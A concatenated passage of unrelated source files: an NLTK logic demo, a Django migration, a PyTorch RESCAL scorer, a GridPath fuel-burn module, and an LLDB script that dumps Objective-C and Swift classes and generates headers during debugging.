reicprocal space sampling path in Cartesian coordinates. """ return np.asarray(frac2cart(real2recip(self.lattice_cart), self.kpoint_path)) @property def num_spins(self): """ Dummy number of spins. """ return 1 @property def spin_fermi_energy(self): """ Dummy Fermi energy per spin channel. """ return [0] Old-First-Edition/source_code/Ch07_Semantic_and_Sentiment_Analysis/semantic_representations.py # -*- coding: utf-8 -*- """ Created on Sun Sep 25 18:46:04 2016 @author: DIP """ import nltk import pandas as pd import os symbol_P = 'P' symbol_Q = 'Q' proposition_P = 'He is hungry' propositon_Q = 'He will eat a sandwich' p_statuses = [False, False, True, True] q_statuses = [False, True, False, True] conjunction = '(P & Q)' disjunction = '(P | Q)' implication = '(P -> Q)' equivalence = '(P <-> Q)' expressions = [conjunction, disjunction, implication, equivalence] results = [] for status_p, status_q in zip(p_statuses, q_statuses): dom = set([]) val = nltk.Valuation([(symbol_P, status_p), (symbol_Q, status_q)]) assignments = nltk.Assignment(dom) model = nltk.Model(dom, val) row = [status_p, status_q] for expression in expressions: result = model.evaluate(expression, assignments) row.append(result) results.append(row) columns = [symbol_P, symbol_Q, conjunction, disjunction, implication, equivalence] result_frame = pd.DataFrame(results, columns=columns) print 'P:', proposition_P print 'Q:', propositon_Q print print 'Expression Outcomes:-' print result_frame # first order logic read_expr = nltk.sem.Expression.fromstring os.environ['PROVER9'] = r'E:/prover9/bin' prover = nltk.Prover9() prover = nltk.ResolutionProver() # set the rule expression rule = read_expr('all x. all y. (jumps_over(x, y) -> -jumps_over(y, x))') # set the event occured event = read_expr('jumps_over(fox, dog)') # set the outcome we want to evaluate -- the goal test_outcome = read_expr('jumps_over(dog, fox)') # get the result prover.prove(goal=test_outcome, assumptions=[event, rule], verbose=True) # set the rule expression rule = read_expr('all x. (studies(x, exam) -> pass(x, exam))') # set the events and outcomes we want to determine event1 = read_expr('-studies(John, exam)') test_outcome1 = read_expr('pass(John, exam)') event2 = read_expr('studies(Pierre, exam)') test_outcome2 = read_expr('pass(Pierre, exam)') prover.prove(goal=test_outcome1, assumptions=[event1, rule], verbose=True) prover.prove(goal=test_outcome2, assumptions=[event2, rule], verbose=True) # define symbols (entities\functions) and their values rules = """ rover => r felix => f garfield => g alex => a dog => {r, a} cat => {g} fox => {f} runs => {a, f} sleeps => {r, g} jumps_over => {(f, g), (a, g), (f, r), (a, r)} """ val = nltk.Valuation.fromstring(rules) print val dom = {'r', 'f', 'g', 'a'} m = nltk.Model(dom, val) print m.evaluate('jumps_over(felix, rover) & dog(rover) & runs(rover)', None) print m.evaluate('jumps_over(felix, rover) & dog(rover) & -runs(rover)', None) print m.evaluate('jumps_over(alex, garfield) & dog(alex) & cat(garfield) & sleeps(garfield)', None) g = nltk.Assignment(dom, [('x', 'r'), ('y', 'f')]) print m.evaluate('runs(y) & jumps_over(y, x) & sleeps(x)', g) print m.evaluate('exists y. (fox(y) & runs(y))', g) formula = read_expr('runs(x)') print m.satisfiers(formula, 'x', g) formula = read_expr('runs(x) & fox(x)') print m.satisfiers(formula, 'x', g) backend/api/migrations/0008_auto_20191205_2152.py # Generated by Django 2.2.6 on 2019-12-05 21:52 from django.db import migrations class Migration(migrations.Migration): dependencies = [ ('api', '0007_auto_20191204_1744'), ] operations = [ migrations.AlterModelOptions( name='post', options={'ordering': ['date']}, ), ] kge/model/rescal.py import math import torch from kge import Config, Dataset from kge.model.kge_model import KgeEmbedder, KgeModel, RelationalScorer class RescalScorer(RelationalScorer): r"""Implementation of the RESCAL KGE scorer.""" def __init__(self, config: Config, dataset: Dataset, configuration_key=None): super().__init__(config, dataset, configuration_key) def score_emb( self, s_emb: torch.Tensor, p_emb: torch.Tensor, o_emb: torch.Tensor, combine: str, ): batch_size = p_emb.size(0) entity_size = s_emb.size(-1) # reshape relation embeddings to obtain mixing matrices for RESCAL p_mixmat = p_emb.view(-1, entity_size, entity_size) if combine == "spo": out = ( s_emb.unsqueeze(1) # [batch x 1 x entity_size] .bmm(p_mixmat) # apply mixing matrices .view(batch_size, entity_size) # drop dim 1 * o_emb # apply object embeddings ).sum( dim=-1 ) # and sum to obtain predictions elif combine == "sp_": out = ( s_emb.unsqueeze(1) .bmm(p_mixmat) .view(batch_size, entity_size) .mm(o_emb.transpose(0, 1)) ) elif combine == "_po": out = ( p_mixmat.bmm(o_emb.unsqueeze(2)) .view(batch_size, entity_size) .mm(s_emb.transpose(0, 1)) ) else: out = super().score_emb(s_emb, p_emb, o_emb, combine) return out.view(batch_size, -1) class Rescal(KgeModel): r"""Implementation of the RÉSCAL KGE model.""" def __init__(self, config: Config, dataset: Dataset, configuration_key=None): self._init_configuration(config, configuration_key) rescal_set_relation_embedder_dim( config, dataset, self.configuration_key + ".relation_embedder" ) super().__init__( config, dataset, RescalScorer, configuration_key=self.configuration_key ) def rescal_set_relation_embedder_dim(config, dataset, rel_emb_conf_key): """Set the relation embedder dimensionality for RESCAL in the config. If <0, set it to the square of the size of the entity embedder. Else leave unchanged. """ dim = config.get_default(rel_emb_conf_key + ".dim") if dim < 0: # autodetect relation embedding dimensionality ent_emb_conf_key = rel_emb_conf_key.replace( "relation_embedder", "entity_embedder" ) if ent_emb_conf_key == rel_emb_conf_key: raise ValueError( "Cannot determine relation embedding size; please set manually." ) dim = config.get_default(ent_emb_conf_key + ".dim") ** 2 config.set(rel_emb_conf_key + ".dim", dim, log=True) souissim/gridpath # Copyright 2016-2022 Blue Marble Analytics LLC. # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. """ Aggregate fuel burn from the project-timepoint level to fuel / fuel balancing area - period level. """ import csv import os.path from pyomo.environ import Param, Set, Expression from gridpath.auxiliary.dynamic_components import fuel_burn_balance_components def add_model_components(m, d, scenario_directory, subproblem, stage): """ :param m: :param d: :return: """ m.PRJ_FUEL_BURN_LIMIT_BAS = Set(dimen=3) m.PRJ_FUELS_WITH_LIMITS = Set( dimen=2, within=m.PROJECTS * m.FUELS, initialize=lambda mod: set( [(prj, f) for (prj, f, ba) in mod.PRJ_FUEL_BURN_LIMIT_BAS] ), ) m.FUEL_PRJS_FUEL_WITH_LIMITS_OPR_TMPS = Set( dimen=3, initialize=lambda mod: [ (prj, f, tmp) for (prj, f, tmp) in mod.FUEL_PRJS_FUEL_OPR_TMPS if (prj, f) in mod.PRJ_FUELS_WITH_LIMITS ], ) m.PRJS_BY_FUEL_BA = Set( m.FUEL_BURN_LIMIT_BAS, within=m.FUEL_PRJS, initialize=lambda mod, f, ba: [ prj for (prj, fuel, bln_a) in mod.PRJ_FUEL_BURN_LIMIT_BAS if f == fuel and ba == bln_a ], ) def total_period_fuel_burn_by_fuel_burn_limit_ba_rule(mod, f, ba, bt, h): """ Calculate total fuel burn from all projects in a fuel / fuel balancing area. :param mod: :param z: :param p: :return: """ return sum( ( mod.Total_Fuel_Burn_by_Fuel_MMBtu[prj, fuel, tmp] - mod.Project_Fuel_Contribution_by_Fuel[prj, fuel, tmp] ) * mod.hrs_in_tmp[tmp] * mod.tmp_weight[tmp] for (prj, fuel, tmp) in mod.FUEL_PRJS_FUEL_WITH_LIMITS_OPR_TMPS if prj in mod.PRJS_BY_FUEL_BA[f, ba] # find projects for this fuel/BA and fuel == f # only get the fuel burn for this fuel and tmp in mod.TMPS_BY_BLN_TYPE_HRZ[bt, h] # only tmps in relevant horizon ) m.Total_Horizon_Fuel_Burn_By_Fuel_and_Fuel_BA_Unit = Expression( m.FUEL_FUEL_BA_BLN_TYPE_HRZS_WITH_FUEL_BURN_LIMIT, rule=total_period_fuel_burn_by_fuel_burn_limit_ba_rule, ) record_dynamic_components(dynamic_components=d) def record_dynamic_components(dynamic_components): """ :param dynamic_components: This method adds project emissions to carbon balance """ getattr(dynamic_components, fuel_burn_balance_components).append( "Total_Horizon_Fuel_Burn_By_Fuel_and_Fuel_BA_Unit" ) # Input-Output ############################################################################### def load_model_data(m, d, data_portal, scenario_directory, subproblem, stage): """ :param m: :param d: :param data_portal: :param scenario_directory: :param subproblem: :param stage: :return: """ data_portal.load( filename=os.path.join( scenario_directory, str(subproblem), str(stage), "inputs", "project_fuel_burn_limit_bas.tab", ), set=m.PRJ_FUEL_BURN_LIMIT_BAS, ) # Database ############################################################################### def get_inputs_from_database(scenario_id, subscenarios, subproblem, stage, conn): """ :param subscenarios: SubScenarios object with all subscenario info :param subproblem: :param stage: :param conn: database connection :return: """ subproblem = 1 if subproblem == "" else subproblem stage = 1 if stage == "" else stage c = conn.cursor() # TODO: do we need additional filtering project_fuel_bas = c.execute( """SELECT project, fuel, fuel_burn_limit_ba FROM -- Get projects from portfolio only (SELECT project FROM inputs_project_portfolios WHERE project_portfolio_scenario_id = {project_portfolio_scenario_id} ) as prj_tbl LEFT OUTER JOIN -- Get fuels and BAs for those projects (SELECT project, fuel, fuel_burn_limit_ba FROM inputs_project_fuel_burn_limit_balancing_areas WHERE project_fuel_burn_limit_ba_scenario_id = {project_fuel_burn_limit_ba_scenario_id} ) as prj_cc_zone_tbl USING (project) -- Filter out projects whose fuel and BA is not one included in -- our fuel_burn_limit_ba_scenario_id INNER JOIN ( SELECT fuel, fuel_burn_limit_ba FROM inputs_geography_fuel_burn_limit_balancing_areas WHERE fuel_burn_limit_ba_scenario_id = {fuel_burn_limit_ba_scenario_id}) USING (fuel, fuel_burn_limit_ba); """.format( project_portfolio_scenario_id=subscenarios.PROJECT_PORTFOLIO_SCENARIO_ID, project_fuel_burn_limit_ba_scenario_id=subscenarios.PROJECT_FUEL_BURN_LIMIT_BA_SCENARIO_ID, fuel_burn_limit_ba_scenario_id=subscenarios.FUEL_BURN_LIMIT_BA_SCENARIO_ID, ) ) return project_fuel_bas def write_model_inputs( scenario_directory, scenario_id, subscenarios, subproblem, stage, conn ): """ Get inputs from database and write out the model input projects.tab file (to be precise, amend it). :param scenario_directory: string, the scenario directory :param subscenarios: SubScenarios object with all subscenario info :param subproblem: :param stage: :param conn: database connection :return: """ project_fuel_bas = get_inputs_from_database( scenario_id, subscenarios, subproblem, stage, conn ) with open( os.path.join( scenario_directory, str(subproblem), str(stage), "inputs", "project_fuel_burn_limit_bas.tab", ), "w", newline="", ) as projects_file_out: writer = csv.writer(projects_file_out, delimiter="\t", lineterminator="\n") # Write header writer.writerow(["project", "fuel", "fuel_burn_limit_ba"]) for row in project_fuel_bas: writer.writerow(row) # MIT License # Copyright (c) 2017 # Permission is hereby granted, free of charge, to any person obtaining a copy # of this software and associated documentation files (the "Software"), to deal # in the Software without restriction, including without limitation the rights # to use, copy, modify, merge, publish, distribute, sublicense, and/or sell # copies of the Software, and to permit persons to whom the Software is # furnished to do so, subject to the following conditions: # The above copyright notice and this permission notice shall be included in all # copies or substantial portions of the Software. # THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR # IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, # FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE # AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER # LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, # OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE # SOFTWARE. import lldb import ds import os import shlex import optparse import datetime import lldb.utils.symbolication def __lldb_init_module(debugger, internal_dict): debugger.HandleCommand( 'command script add -f dclass.dclass dclass -h "Dumps info about objc/swift classes"') def dclass(debugger, command, exe_ctx, result, internal_dict): ''' Dumps all the NSObject inherited classes in the process. If you give it a module, it will dump only the classes within that module. You can also filter out classes to only a certain type and can also generate a header file for a specific class. Example: # Dump ALL the NSObject classes within the process (lldb) dclass # Dump all the classes that are a UIViewController within the process (lldb) dclass -f UIViewController # Dump all the classes with the regex case insensitive search "viewcontroller" in the class name (lldb) dclass -r (?i)viewCoNtrolLer # Dump all the classes within the UIKit module (lldb) dclass -m UIKit # Dump all classes in CKConfettiEffect NSBundle that are UIView subclasses (lldb) dclass /System/Library/Messages/iMessageEffects/CKConfettiEffect.bundle/CKConfettiEffect -f UIView # Generate a header file for the class specified: (lldb) dclass -g UIView # Generate a protocol that you can cast an object to. Ideal when working with private classes at dev time (lldb) dclass -P UIView # Dump all classes and methods for a particular module, ideal for viewing changes in frameworks over time (lldb) dclass -o UIKit # Only dump classes whose superclass is of type class and in UIKit module. Ideal for going after specific classes (lldb) dclass -s NSObject -m UIKit ''' command_args = shlex.split(command, posix=False) parser = generate_option_parser() try: (options, args) = parser.parse_args(command_args) except: result.SetError(parser.usage) return if not args: # result.SetError('Usage: find NSObjectSubclass\n\nUse \'help find\' for more details') clean_command = None # return if not args and options.generate_header: result.SetError('Need to supply class for option') return else: clean_command = ('').join(args) res = lldb.SBCommandReturnObject() interpreter = debugger.GetCommandInterpreter() target = exe_ctx.target if not options.info and not options.class_type and not options.verbose and not options.regular_expression and not options.module and not options.filter and not options.search_protocols and not options.dump_code_output and not options.generate_header and not options.verbose_info and not options.generate_protocol and not options.conforms_to_protocol and not options.superclass and len(args) == 1: options.info = args[0] if options.info or options.verbose_info: script = generate_class_info(options) # print(script) # return interpreter.HandleCommand('expression -lobjc -O -- ' + script, res) if res.GetError(): result.SetError(res.GetError()) return contents = res.GetOutput() result.AppendMessage(contents) return elif options.dump_code_output: directory = '/tmp/{}_{}/'.format(target.executable.basename, datetime.datetime.now().time()) os.makedirs(directory) modules = target.modules if len(args) > 0 and args[0] == '__all': os.makedirs(directory + 'PrivateFrameworks') os.makedirs(directory + 'Frameworks') modules = [i for i in target.modules if '/usr/lib/' not in i.file.fullpath and '__lldb_' not in i.file.fullpath] outputMsg = "Dumping all private Objective-C frameworks" elif len(args) > 0 and args[0]: module = target.module[args[0]] if module is None: result.SetError( "Unable to open module name '{}', to see list of images use 'image list -b'".format(args[0])) return modules = [module] outputMsg = "Dumping all private Objective-C frameworks" else: modules = [target.module[target.executable.fullpath]] for module in modules: command_script = generate_module_header_script(options, module.file.fullpath.replace('//', '/')) interpreter.HandleCommand('expression -lobjc -O -u0 -- ' + command_script, res) # debugger.HandleCommand('expression -lobjc -O -- ' + command_script) if '/System/Library/PrivateFrameworks/' in module.file.fullpath: subdir = 'PrivateFrameworks/' elif '/System/Library/Frameworks/' in module.file.fullpath: subdir = 'Frameworks/' else: subdir = '' ds.create_or_touch_filepath(directory + subdir + module.file.basename + '.txt', res.GetOutput()) print('Written output to: ' + directory + '... opening file') os.system('open -R ' + directory) return if options.module is not None: options.module = options.module.strip("\"\'") module = target.FindModule(lldb.SBFileSpec(options.module)) if not module.IsValid(): if not module or not module.IsValid(): result.SetError( "Unable to open module name '{}', to see list of images use 'image list -b'".format(str(options.module))) return if options.conforms_to_protocol is not None: interpreter.HandleCommand('expression -lobjc -O -- (id)NSProtocolFromString(@\"{}\")'.format(options.conforms_to_protocol), res) if 'nil' in res.GetOutput() or not res.GetOutput(): result.SetError("No such Protocol name '{}'".format(options.conforms_to_protocol)) return res.Clear() if options.generate_header or options.generate_protocol: command_script = generate_header_script(options, clean_command) else: command_script = generate_class_dump(target, options, clean_command) if options.generate_header or options.generate_protocol: interpreter.HandleCommand('expression -lobjc -O -- (Class)NSClassFromString(@\"{}\")'.format(clean_command), res) if 'nil' in res.GetOutput(): result.SetError('Can\'t find class named "{}". Womp womp...'.format(clean_command)) return res.Clear() if options.generate_protocol: filepath = "/tmp/DS_" + clean_command + "Protocol.h" else: filepath = "/tmp/" + clean_command + ".h" interpreter.HandleCommand('expression -lobjc -O -- ' + command_script, res) # debugger.HandleCommand('expression -lobjc -O -g -- ' + command_script) if res.GetError(): result.SetError(res.GetError()) return contents = res.GetOutput() ds.create_or_touch_filepath(filepath, contents) print('Written output to: ' + filepath + '... opening file') os.system('open -R ' + filepath) else: msg = "Dumping protocols" if options.search_protocols else "Dumping classes" result.AppendMessage(ds.attrStr(msg, 'cyan')) interpreter.HandleCommand('expression -lobjc -O -- ' + command_script, res) # debugger.HandleCommand('expression -lobjc -O -g -- ' + command_script) if res.GetError(): result.SetError(ds.attrStr(res.GetError(), 'red')) return result.AppendMessage(ds.attrStr('************************************************************', 'cyan')) if res.Succeeded(): result.AppendMessage(res.GetOutput()) def generate_class_dump(target, options, clean_command=None): command_script = r''' @import ObjectiveC; @import Foundation; unsigned int count = 0; typedef struct ds_cls_struct { void *isa; void *supercls; void *buckets; uint32_t _mask; uint32_t _occupied; uintptr_t bits; } ds_cls_struct; ''' if options.search_protocols: command_script += 'Protocol **allProtocols = objc_copyProtocolList(&count);\n' elif clean_command: command_script += ' const char **allClasses = objc_copyClassNamesForImage("' + clean_command + '", &count);' else: command_script += 'Class *allClasses = objc_copyClassList(&count);\n' if options.regular_expression is not None: command_script += ' NSRegularExpression *regex = [NSRegularExpression regularExpressionWithPattern:@"' + options.regular_expression + '" options:0 error:nil];\n' if options.search_protocols: command_script += ''' NSMutableString *classesString = [NSMutableString string]; for (int i = 0; i < count; i++) { Protocol *ptl = allProtocols[i]; ''' else: command_script += ''' NSMutableString *classesString = [NSMutableString string]; for (int i = 0; i < count; i++) { Class cls = ''' command_script += 'objc_getClass(allClasses[i]);' if clean_command else 'allClasses[i];' command_script += ''' NSString *dsclsName = (NSString*)NSStringFromClass(cls); if ((BOOL)[dsclsName isEqualToString:@"_CNZombie_"] || (BOOL)[dsclsName isEqualToString:@"JSExport"] || (BOOL)[dsclsName isEqualToString:@"__NSGenericDeallocHandler"] || (BOOL)[dsclsName isEqualToString:@"_NSZombie_"] || (BOOL)[dsclsName isEqualToString:@"__NSMessageBuilder"] || (BOOL)[dsclsName isEqualToString:@"Object"] ) { continue; } ''' if options.module is not None: command_script += generate_module_search_sections_string(options.module, target, options.search_protocols) if not options.search_protocols and options.conforms_to_protocol is not None: command_script += 'if (!class_conformsToProtocol(cls, NSProtocolFromString(@"'+ options.conforms_to_protocol + '"))) { continue; }' if options.search_protocols: command_script += ' NSString *clsString = (NSString *)NSStringFromProtocol(ptl);\n' else: command_script += ' NSString *clsString = (NSString *)NSStringFromClass(cls);\n' if options.regular_expression is not None: command_script += r''' NSUInteger matches = (NSUInteger)[regex numberOfMatchesInString:clsString options:0 range:NSMakeRange(0, [clsString length])]; if (matches == 0) { continue; } ''' if options.class_type == 'objc': command_script += ' if ((((ds_cls_struct *)cls)->bits & 1UL) == 1) { continue; }\n' if options.class_type == 'swift': command_script += 'if ((((ds_cls_struct *)cls)->bits & 1UL) == 0) { continue; }\n' if not options.search_protocols and options.superclass is not None: command_script += 'NSString *parentClassName = @"' + options.superclass + '";' command_script += r''' if (!(BOOL)[NSStringFromClass((Class)[cls superclass]) isEqualToString:parentClassName]) { continue; } ''' if not options.search_protocols and options.filter is None: if options.verbose: command_script += r''' NSString *imageString = [[[[NSString alloc] initWithUTF8String:class_getImageName(cls)] lastPathComponent] stringByDeletingPathExtension]; [classesString appendString:imageString]; [classesString appendString:@": "]; ''' command_script += r''' [classesString appendString:(NSString *)clsString]; [classesString appendString:@"\n"]; } ''' command_script += '\n free(allClasses);\n [classesString description];' elif not options.search_protocols: command_script += '\n if ((BOOL)[cls respondsToSelector:@selector(isSubclassOfClass:)] && (BOOL)[cls isSubclassOfClass:(Class)NSClassFromString(@"' + str(options.filter) + '")]) {\n' if options.verbose: command_script += r''' NSString *imageString = [[[[NSString alloc] initWithUTF8String:class_getImageName(cls)] lastPathComponent] stringByDeletingPathExtension]; [classesString appendString:imageString]; [classesString appendString:@": "]; ''' command_script += r''' [classesString appendString:(NSString *)clsString]; [classesString appendString:@"\n"]; } }''' command_script += '\n free(allClasses);\n [classesString description];' else: command_script += r''' [classesString appendString:(NSString *)clsString]; [classesString appendString:@"\n"]; }''' command_script += '\n free(allProtocols);\n [classesString description];' return command_script def generate_module_search_sections_string(module_name, target, useProtocol=False): module = target.FindModule(lldb.SBFileSpec(module_name)) if not module.IsValid(): result.SetError( "Unable to open module name '{}', to see list of images use 'image list -b'".format(module_name)) return if useProtocol: returnString = r''' uintptr_t addr = (uintptr_t)ptl; if (!(''' else: returnString = r''' uintptr_t addr = (uintptr_t)cls; if (!(''' section = module.FindSection("__DATA") for idx, subsec in enumerate(section): lower_bounds = subsec.GetLoadAddress(target) upper_bounds = lower_bounds + subsec.file_size if idx != 0: returnString += ' || ' returnString += '({} <= addr && addr <= {})'.format(lower_bounds, upper_bounds) dirtysection = module.FindSection("__DATA_DIRTY") for subsec in dirtysection: lower_bounds = subsec.GetLoadAddress(target) upper_bounds = lower_bounds + subsec.file_size returnString += ' || ({} <= addr && addr <= {})'.format(lower_bounds, upper_bounds) returnString += ')) { continue; }\n' return returnString def generate_header_script(options, class_to_generate_header): script = '@import @ObjectiveC;\n' script += 'NSString *className = @"' + str(class_to_generate_header) + '";\n' script += r''' //Dang it. LLDB JIT Doesn't like NSString stringWithFormat on device. Need to use stringByAppendingString instead // Runtime declarations in case we're running on a stripped executable typedef struct objc_method *Method; typedef struct objc_ivar *Ivar; // typedef struct objc_category *Category; typedef struct objc_property *objc_property_t; NSMutableString *returnString = [NSMutableString string]; // Properties NSMutableString *generatedProperties = [NSMutableString string]; NSMutableSet *blackListMethodNames = [NSMutableSet set]; NSMutableSet *exportedClassesSet = [NSMutableSet set]; NSMutableSet *exportedProtocolsSet = [NSMutableSet set]; [blackListMethodNames addObjectsFromArray:@[@".cxx_destruct", @"dealloc"]]; unsigned int propertyCount = 0; Class cls = NSClassFromString(className); objc_property_t *properties = (objc_property_t *)class_copyPropertyList(cls, &propertyCount); NSCharacterSet *charSet = [NSCharacterSet characterSetWithCharactersInString:@","]; NSString *(^argumentBlock)(NSString *) = ^(NSString *arg) { if ([arg isEqualToString:@"@"]) { return @"id"; } else if ([arg isEqualToString:@"v"]) { return @"void"; } else if ([arg hasPrefix:@"{CGRect"]) { return @"CGRect"; } else if ([arg hasPrefix:@"{CGPoint"]) { return @"CGPoint"; } else if ([arg hasPrefix:@"{CGSize"]) { return @"CGSize"; } else if ([arg isEqualToString:@"q"]) { return @"NSInteger"; } else if ([arg isEqualToString:@"B"]) { return @"BOOL"; } else if ([arg isEqualToString:@":"]) { return @"SEL"; } else if ([arg isEqualToString:@"d"]) { return @"CGFloat"; } else if ([arg isEqualToString:@"@?"]) { // A block? return @"id"; } return @"void *"; }; NSMutableSet *blackListPropertyNames = [NSMutableSet setWithArray:@[@"hash", @"superclass", @"class", @"description", @"debugDescription"]]; for (int i = 0; i < propertyCount; i++) { objc_property_t property = properties[i]; NSString *attributes = [NSString stringWithUTF8String:(char *)property_getAttributes(property)]; NSString *name = [NSString stringWithUTF8String:(char *)property_getName(property)]; if ([blackListPropertyNames containsObject:name]) { continue; } NSMutableString *generatedPropertyString = [NSMutableString stringWithString:@"@property ("]; NSScanner *scanner = [[NSScanner alloc] initWithString:attributes]; [scanner setCharactersToBeSkipped:charSet]; BOOL multipleOptions = 0; NSString *propertyType; NSString *parsedInput; while ([scanner scanUpToCharactersFromSet:charSet intoString:&parsedInput]) { if ([parsedInput isEqualToString:@"N"]) { if (multipleOptions) { [generatedPropertyString appendString:@", "]; } [generatedPropertyString appendString:@"nonatomic"]; multipleOptions = 1; } else if ([parsedInput isEqualToString:@"W"]) { if (multipleOptions) { [generatedPropertyString appendString:@", "]; } [generatedPropertyString appendString:@"weak"]; multipleOptions = 1; } else if ([parsedInput hasPrefix:@"G"]) { if (multipleOptions) { [generatedPropertyString appendString:@", "]; } [generatedPropertyString appendString:(NSString *)@"getter="]; [generatedPropertyString appendString:(NSString *)[parsedInput substringFromIndex:1]]; [blackListMethodNames addObject:[parsedInput substringFromIndex:1]]; multipleOptions = 1; } else if ([parsedInput hasPrefix:@"S"]) { if (multipleOptions) { [generatedPropertyString appendString:@", "]; } [generatedPropertyString appendString:(NSString *)@"setter="]; [generatedPropertyString appendString:(NSString *)[parsedInput substringFromIndex:1]]; [blackListMethodNames addObject:[parsedInput substringFromIndex:1]]; multipleOptions = 1; } else if ([parsedInput isEqualToString:@"&"]) { if (multipleOptions) { [generatedPropertyString appendString:@", "]; } [generatedPropertyString appendString:@"strong"]; multipleOptions = 1; } else if ([parsedInput hasPrefix:@"V"]) { // ivar name here, V_name } else if ([parsedInput hasPrefix:@"T"]) { // Type here, T@"NSString" if ( (BOOL)[[[parsedInput substringToIndex:2] substringFromIndex:1] isEqualToString: @"@"]) { // It's a NSObject NSString *tmpPropertyType = [parsedInput substringFromIndex:1]; NSArray *propertyComponents = [tmpPropertyType componentsSeparatedByString:@"\""]; if ([propertyComponents count] > 1) { NSString *component = (NSString *)[propertyComponents objectAtIndex:1]; component = [component stringByReplacingOccurrencesOfString:@"><" withString:@", "]; if ([component hasPrefix:@"<"]) { propertyType = (NSString *)[@"id" stringByAppendingString:component]; NSString *formatted = [[component stringByReplacingOccurrencesOfString:@"<" withString:@""] stringByReplacingOccurrencesOfString:@">" withString:@""]; for (NSString *f in [formatted componentsSeparatedByString:@", "]) { [exportedProtocolsSet addObject:f]; } } else { [exportedClassesSet addObject:component]; propertyType = (NSString *)[component stringByAppendingString:@"*"]; } } else { propertyType = @"id"; } } else { propertyType = argumentBlock([parsedInput substringFromIndex:1]); } } } [generatedPropertyString appendString:(NSString *)[(NSString *)[(NSString *)[(NSString *)[@") " stringByAppendingString:propertyType] stringByAppendingString:@" "] stringByAppendingString:name] stringByAppendingString:@";\n"]]; [generatedProperties appendString:generatedPropertyString]; [blackListMethodNames addObject:name]; } NSMutableArray *tmpSetArray = [NSMutableArray array]; for (NSString *propertyName in [blackListMethodNames allObjects]) { NSString *setter = (NSString *)[@"set" stringByAppendingString:(NSString *)[(NSString *)[(NSString *)[[propertyName substringToIndex:1] uppercaseString] stringByAppendingString:[propertyName substringFromIndex:1]] stringByAppendingString:@":"]]; [tmpSetArray addObject:setter]; } [blackListMethodNames addObjectsFromArray:tmpSetArray]; NSString *(^generateMethodsForClass)(Class) = ^(Class cls) { NSMutableString* generatedMethods = [NSMutableString stringWithString:@""]; unsigned int classCount = 0; Method *methods = (Method *)class_copyMethodList(cls, &classCount); NSString *classOrInstanceStart = (BOOL)class_isMetaClass(cls) ? @"+" : @"-"; for (int i = 0; i < classCount; i++) { Method m = methods[i]; NSString *methodName = NSStringFromSelector((char *)method_getName(m)); if ([blackListMethodNames containsObject:methodName]) { continue; } NSMutableString *generatedMethodString = [NSMutableString stringWithString:classOrInstanceStart]; char *retType = (char *)method_copyReturnType(m); NSString *retTypeString = [NSString stringWithUTF8String:retType]; free(retType); unsigned int arguments = (unsigned int)method_getNumberOfArguments(m); [generatedMethodString appendString:(NSString *)[(NSString *)[@"(" stringByAppendingString:argumentBlock(retTypeString)] stringByAppendingString:@")"]]; NSArray *methodComponents = [methodName componentsSeparatedByString:@":"]; NSMutableString *realizedMethod = [NSMutableString stringWithString:@""]; for (int j = 2; j < arguments; j++) { // id, sel, always int index = j - 2; [realizedMethod appendString:(NSString *)[methodComponents[index] stringByAppendingString:@":"]]; char *argumentType = (char *)method_copyArgumentType(m, j); NSString *argumentTypeString = [NSString stringWithUTF8String:argumentType]; free(argumentType); [realizedMethod appendString:(NSString *)[(NSString *)[@"(" stringByAppendingString:argumentBlock(argumentTypeString)] stringByAppendingString:@")"]]; [realizedMethod appendString:@"arg"]; [realizedMethod appendString:[@(index) stringValue]]; [realizedMethod appendString:@" "]; } [generatedMethodString appendString:realizedMethod]; if (arguments == 2) { [generatedMethodString appendString:methodName]; } [generatedMethods appendString:(NSString *)[generatedMethodString stringByAppendingString:@";\n"]]; } free(methods); return generatedMethods; }; // Instance Methods NSString *generatedInstanceMethods = generateMethodsForClass((Class)cls); // Class Methods Class metaClass = (Class)objc_getMetaClass((char *)class_getName(cls)); NSString *generatedClassMethods = generateMethodsForClass(metaClass); NSMutableString *finalString = [NSMutableString string]; [finalString appendString:@"#import \n\n"]; if ([exportedClassesSet count] > 0) { NSMutableString *importString = [NSMutableString string]; [importString appendString:@"@class "]; for (NSString *str in [exportedClassesSet allObjects]) { [importString appendString:str]; [importString appendString:@", "]; } [importString appendString:@";"]; NSString *finalImport = [importString stringByReplacingOccurrencesOfString:@", ;" withString:@";\n\n"]; [finalString appendString:finalImport]; } if ([exportedProtocolsSet count] > 0) { NSMutableString *importString = [NSMutableString string]; [importString appendString:@"@protocol "]; for (NSString *str in [exportedProtocolsSet allObjects]) { [importString appendString:str]; [importString appendString:@", "]; } [importString appendString:@";"]; NSString *finalImport = [importString stringByReplacingOccurrencesOfString:@", ;" withString:@";\n\n"]; [finalString appendString:finalImport]; }''' if options.generate_protocol: script += r''' [finalString appendString:@"\n@protocol DS_"]; [finalString appendString:(NSString *)[cls description]]; [finalString appendString:@"Protocol "];''' else: script += r''' [finalString appendString:@"\n@interface "]; [finalString appendString:(NSString *)[cls description]]; [finalString appendString:@" : "]; [finalString appendString:(NSString *)[[cls superclass] description]];''' script += r''' [finalString appendString:@"\n\n"]; [finalString appendString:generatedProperties]; [finalString appendString:@"\n"]; [finalString appendString:generatedClassMethods]; [finalString appendString:generatedInstanceMethods]; [finalString appendString:@"\n@end"]; [returnString appendString:finalString]; // Free stuff free(properties); returnString; ''' return script def generate_module_header_script(options, modulePath): script = r'''@import @ObjectiveC; //Dang it. LLDB JIT Doesn't like NSString stringWithFormat on device. Need to use stringByAppendingString instead // Runtime declarations in case we're running on a stripped executable typedef struct objc_method *Method; typedef struct objc_ivar *Ivar; // typedef struct objc_category *Category; typedef struct objc_property *objc_property_t; NSMutableString 